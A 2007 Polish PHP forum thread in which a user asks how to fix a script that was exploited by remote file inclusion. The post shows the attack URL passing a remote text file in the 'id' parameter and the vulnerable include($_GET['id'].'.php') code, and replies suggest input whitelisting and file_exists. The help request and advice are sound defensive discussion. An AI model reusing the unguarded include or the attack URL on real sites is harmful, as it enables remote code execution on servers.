 [php] dziura w skrypcie $id = $_GET['id']; |
  |
| [php] dziura w skrypcie $id = $_GET['id']; |
 24.05.2007, 20:10:39
Post
#1
|
|
|
Grupa: Zarejestrowani Postów: 8 Pomógł: 0 Dołączył: 28.11.2006 Ostrzeżenie: (0%) 
 |
witam,
ostatnio na moim servaerze ktos wykorzystal blad znajdujacy sie w skrypcie ktory napisalem , otorz : wykonal polecenie za pomoca mojego servera tzn : www.example.pl/index.php?id=http://www.naszserver.pl/nazwa_pliku.txt niestety przez ta diure w skrypcie zostalo zawieszone mi konto hostingowe , zrodlo mojego pliku index.php to : Kod <? $id = $_GET['id']; if($id=="") include('indeks2.php'); else { #if(file_exists("$id.php")) $a=$id.".php"; include ($a); #else #include("404.html"); } ?> Niestety nie wiem co mam zrobic , jakie zmiany wprowadzic aby nie bylo mozliwe wykorzystywanie skryptow z poza mojego servera ? pozdrawiam serdecznie [+] edit Przenoszę na Przedszkole. --- ~strife |
 |
 
|
|
24.05.2007, 20:34:02
Post
#2
|
|
 Admin Techniczny Grupa: Administratorzy Postów: 2 071 Pomógł: 93 Dołączył: 5.07.2005 Skąd: Olsztyn |
a czemu if, else masz zakomentowane??
|
|
|
|
|
24.05.2007, 20:45:57
Post
#3
|
|
|
Grupa: Zarejestrowani Postów: 187 Pomógł: 0 Dołączył: 24.12.2006 Ostrzeżenie: (0%)
|
a co to za problem
 nie dość że masz zakomentowane to nie wiesz że możesz sprawdzić co znajduje się w zmiennej z $_GET i dopóścić tylko np. litery i cyfry oraz kropke a w przeciwnym razie includujesz index .
-------------------- c++ , javascript , PHP , SQL , MYSQL , CSS - wszystko czego potrzebuje prawdziwy mężczyzna LoL
|
|
|
|
|
25.05.2007, 10:19:31
Post
#4
|
|
 Grupa: Zarejestrowani Postów: 999 Pomógł: 30 Dołączył: 14.01.2007 Skąd: wiesz ? Ostrzeżenie: (0%)
|
|
|
|
|
|
25.05.2007, 11:49:56
Post
#5
|
|
 Grupa: Zarejestrowani Postów: 690 Pomógł: 81 Dołączył: 6.04.2005 Skąd: Szczecin Ostrzeżenie: (0%)
|
use file_exists
-------------------- |
|
|
|
|
|
Wersja Lo-Fi | Aktualny czas: 17.06.2025 - 18:39 |
